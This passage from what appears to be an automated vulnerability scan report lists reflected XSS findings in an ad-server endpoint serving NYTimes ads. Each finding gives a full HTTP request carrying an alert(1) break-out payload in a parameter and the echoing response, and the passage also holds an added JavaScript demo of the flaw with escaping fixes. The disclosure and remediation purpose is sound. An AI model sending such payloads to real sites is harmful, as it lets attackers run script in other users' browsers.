4.4. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61202"-alert(1)-"7b65acf75e6 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt461202"-alert(1)-"7b65acf75e6&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
pc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt461202"-alert(1)-"7b65acf75e6&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFo
...[SNIP]...

4.5. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a397'-alert(1)-'995d035cf44 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt49a397'-alert(1)-'995d035cf44&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
pc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt49a397'-alert(1)-'995d035cf44&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.6. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35005"-alert(1)-"41c9df98c41 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=35005"-alert(1)-"41c9df98c41 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=35005"-alert(1)-"41c9df98c41http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

4.7. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53295'-alert(1)-'b8913ad603b was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=53295'-alert(1)-'b8913ad603b HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=53295'-alert(1)-'b8913ad603bhttp://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.8. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d553"-alert(1)-"341ef100f1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&2d553"-alert(1)-"341ef100f1a=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6575

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ngs.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&2d553"-alert(1)-"341ef100f1a=1http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "f
...[SNIP]...

4.9. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73647'-alert(1)-'11293dd737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&73647'-alert(1)-'11293dd737=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6571

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ngs.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&73647'-alert(1)-'11293dd737=1http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...
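The break-out mechanism described in the two findings above (a double-quoted string in the first, a single-quoted document.write() string in 4.9) and the escaping the remediation calls for, as an added JavaScript example. This is not DoubleClick's code and not part of the report: the two "vulnerable" templates are hypothetical stand-ins for the ad server's response generation, reduced to the two places where the click parameter is echoed; the payloads and URL fragments are taken from the requests and responses above, and the alert()/document.write() stubs only record what a browser would have executed.

```javascript
// Added example; not DoubleClick's code. The two "vulnerable" templates are hypothetical
// stand-ins for the ad server's response generation, reduced to the two places where the
// click parameter is echoed: a single-quoted document.write() string and a double-quoted
// string assigned to `url`. Payloads and URL fragments are the ones shown in the report.
const PAYLOAD_DQ = '2d553"-alert(1)-"341ef100f1a';  // double-quote context
const PAYLOAD_SQ = "73647'-alert(1)-'11293dd737";   // single-quote context
const LANDING = 'http://www.respire.hyatt.com?src=agn_hhc_ba_nyt';

// Constructed click parameter, shortened from the report's request line.
function clickParam(payload) {
  return 'http://www.nytimes.com/adx/bin/adx_click.html?type=goto&goto=&' + payload + '=1';
}

// --- vulnerable: the click parameter is concatenated straight into the JavaScript ---
function buildUrlVarVulnerable(click) {
  return 'var url = "' + click + LANDING + '";';
}
function buildWriteVulnerable(click) {
  return "document.write('<a href=\"" + click + LANDING + "\">Ad</a>');";
}

// --- hardened ---
// Escape every character outside [A-Za-z0-9] as \xHH (\uHHHH above 0xFF). Inside a JS
// string literal this makes quotes, backslashes, newlines and "</script>" inert.
function jsStringEscape(s) {
  return s.replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code <= 0xff
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}
// Data that document.write() will parse as HTML needs the HTML layer encoded first and the
// JS layer second, because the browser decodes the JS escapes before it parses the HTML.
function htmlAttrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}
function buildUrlVarHardened(click) {
  return 'var url = "' + jsStringEscape(click + LANDING) + '";';
}
function buildWriteHardened(click) {
  return "document.write('<a href=\"" + jsStringEscape(htmlAttrEncode(click + LANDING)) + "\">Ad</a>');";
}

// Run a generated script the way a page that includes the ad tag would, with recording
// stubs for alert() and document.write(). Returns what fired and what `url` became.
function runAd(script) {
  const alerts = [];
  const written = [];
  const fn = new Function('alert', 'document', 'var url;\n' + script + '\nreturn url;');
  const url = fn((v) => { alerts.push(v); }, { write: (html) => { written.push(html); } });
  return { alerts, written, url };
}

function demo() {
  return {
    vulnerableUrlVar: runAd(buildUrlVarVulnerable(clickParam(PAYLOAD_DQ))), // alert(1) fires, url is NaN
    vulnerableWrite: runAd(buildWriteVulnerable(clickParam(PAYLOAD_SQ))),   // alert(1) fires, NaN is written
    hardenedUrlVar: runAd(buildUrlVarHardened(clickParam(PAYLOAD_DQ))),     // no alert, url round-trips intact
    hardenedWrite: runAd(buildWriteHardened(clickParam(PAYLOAD_SQ))),       // no alert, attribute-safe HTML written
  };
}
console.log(demo());
```

The `"..."-alert(1)-"..."` shape works because the subtraction operators keep the statement syntactically valid after the string literal has been closed, so nothing breaks and the browser runs alert(1) as part of evaluating the expression; the escaped versions keep the whole value inside the literal, which is the check to repeat against a real fix.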

4.10. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1849'-alert(1)-'2cc4670e0ae was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectorye1849'-alert(1)-'2cc4670e0ae&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
54%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectorye1849'-alert(1)-'2cc4670e0ae&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=a
...[SNIP]...

4.11. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcfa4"-alert(1)-"cc117967b6a was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfcfa4"-alert(1)-"cc117967b6a&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
54%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfcfa4"-alert(1)-"cc117967b6a&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=a
...[SNIP]...

4.12. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dce1f"-alert(1)-"06f671b37b9 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddledce1f"-alert(1)-"06f671b37b9&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddledce1f"-alert(1)-"06f671b37b9&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt
...[SNIP]...

4.13. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 393c6'-alert(1)-'1d2aff2c6c1 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle393c6'-alert(1)-'1d2aff2c6c1&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
